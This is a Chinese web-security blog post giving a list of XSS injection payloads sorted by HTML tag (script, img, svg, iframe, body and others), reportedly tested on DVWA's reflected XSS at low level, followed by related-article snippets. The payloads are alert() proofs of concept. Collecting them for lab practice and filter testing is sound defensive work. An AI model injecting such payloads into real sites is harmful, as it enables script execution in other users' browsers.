web安全---XSS漏洞之标签使用2
所有标签已经测试完并可以使用,测试环境:DVWA的反射型XSS,等级low
0x01 <script>标签
<script>alert(2)</script>
<script>alert(2)</script//
0x02 <img>标签
<img src="x" onerror=alert(1)>;
<img src="1" onerror=eval("alert('xss')")>;
<img src=1 onmouseover=alert('xss')>
0x03 <a>标签
<a href="javascript:alert('xss')">aa</a>
<a href=javascript:eval(alert('xss'))>aa</a>
0x04 input标签
<input value="" onclick=alert('xss') type="text">
<input name="name" value="" onmouseover=prompt('xss') bad="">
0x05 svg标签
<svg onload=alert(1)>
0x06 details标签
<details ontoggle="alert('xss');">
<details open ontoggle="alert('xss');">
0x07 select标签
<select onfocus=alert(1)></select>
<select onfocus=alert(1) autofocus>
0x08 iframe标签
<iframe onload=alert("xss");></iframe>0x09 video标签
<video><source onerror="alert(1)">
0x0A audio标签
<audio src=x onerror=alert("xss");>
0x0B body标签
<body/onload=alert("xss");>
0x0C textarea标签
<textarea onfocus=alert("xss"); autofocus>
-------------------------------------------------------------
目前只有这么多,以后继续加
web安全---XSS漏洞之标签使用2相关推荐
- Web安全 XSS漏洞的利用(Beef工具)(点击链接就被黑的技术.)
XSS漏洞的 概括: XSS又叫CSS(Cross Site Script)跨站脚本攻击,指的是攻击者在Web页面,插入恶意JS代码,当用户浏览该页之时,嵌入其中JS代码就会被执行,从而达到攻击的目的 ...
- web安全----XSS漏洞之基本原理
0x01 概述 XSS为跨站脚本攻击,XSS攻击针对的是用户层面的攻击!类型有反射型XSS.存储型XSS.DOM型XSS,这里的DOM可以理解为页面,或者是所有的标签.内容之和 0x02 反射型XSS ...
- Web安全之XSS漏洞
同源策略 同源策略(Same-Origin Policy),就是为了保证互联网之中,各类资源的安全性而诞生的产物,它实际上是一个众多浏览器厂商共同遵守的约定.同源策略是浏览器中最基本的安全功能.缺少同 ...
- WEB安全:XSS漏洞与SQL注入漏洞介绍及解决方案
对web安全方面的知识非常薄弱,这篇文章把Xss跨站攻击和sql注入的相关知识整理了下,希望大家多多提意见. 对于防止sql注入发生,我只用过简单拼接字符串的注入及参数化查询,可以说没什么好经验,为避 ...
- Web应用进行XSS漏洞测试
对 WEB 应用进行 XSS 漏洞测试,不能仅仅局限于在 WEB 页面输入 XSS 攻击字段,然后提交.绕过 JavaScript 的检测,输入 XSS 脚本,通常被测试人员忽略.下图为 XSS 恶意 ...
- web漏洞-xss漏洞
web漏洞-xss漏洞 文章目录 web漏洞-xss漏洞 前言 xss介绍 什么是xss xss漏洞产生原因 xss漏洞危害 xss漏洞分类 反射型xss 存储型xss DOM型xss xss漏洞防护 ...
- html%3ca%3e标签中有变量,经过代码审计找出网站中的XSS漏洞实战(三)
1.背景 笔者此前录制了一套XSS的视频教程,在漏洞案例一节中讲解手工挖掘.工具挖掘.代码审计三部份内容,准备将内容用文章的形式再次写一此,前两篇已经写完,内容有一些关联性,其中手工XSS挖掘篇地址为 ...
- 开源web应用中存在三个XSS漏洞,可导致系统遭攻陷
聚焦源代码安全,网罗国内外最新资讯! 编译:代码卫士 PT Swarm 公司的研究人员在热门的开源开发应用Evaluation CMS.FUDForum 和 GitBucket中发现了三个跨站脚本 ...
- 通过Web安全工具Burp suite找出网站中的XSS漏洞实战(二) 1
一.背景 笔者6月份在慕课网录制视频教程XSS跨站漏洞 加强Web安全,里面需要讲到很多实战案例,在漏洞挖掘案例中分为了手工挖掘.工具挖掘.代码审计三部分内容,手工挖掘篇参考地址为快速找出网站中可能存 ...
最新文章
- 安装batocera-linux教程_利用Grub2Win安装Batocera+Windows7双系统甚至多系统实战教程
- qt中用mysql获取所有的数据库、数据库中的表名
- Android Service的思考(1)
- 014_Spring事务
- Android --- Binary XML file line2 Binary XML file line 2 Error inflating class unknown
- 【Java】使用Java调用Python的四种方法
- numpy之reshape()
- 2015年第六届蓝桥杯 - 省赛 - C/C++大学B组 - H.移动距离
- vscode 结束_21 个VSCode 快捷键,让代码更快,更有趣
- DllRegisterServer的调用失败的问题解决方法
- 矩池云如何使用 conda create 创建纯净的 Python3.6 环境?
- Bailian2743 字符串判等【字符串】
- problem c: 判断素数的函数_python100天 — Day 6 函数和模块的使用
- 18.事件基础,event对象,clientX,clientY,keyCode
- Unable to open log device '/dev/log/main' : No such file or directory it ...
- mysql建表指定表空间_Oracle中建表和指定表空间
- go标准库的学习-net
- linux系统网络代理设置
- 雷电android模拟器端口,【雷电命令】雷电安卓模拟器修改信息及常用adb命令整理贴...
- 小米手机计算机usb连接,小米手机连接电脑不显示usb选项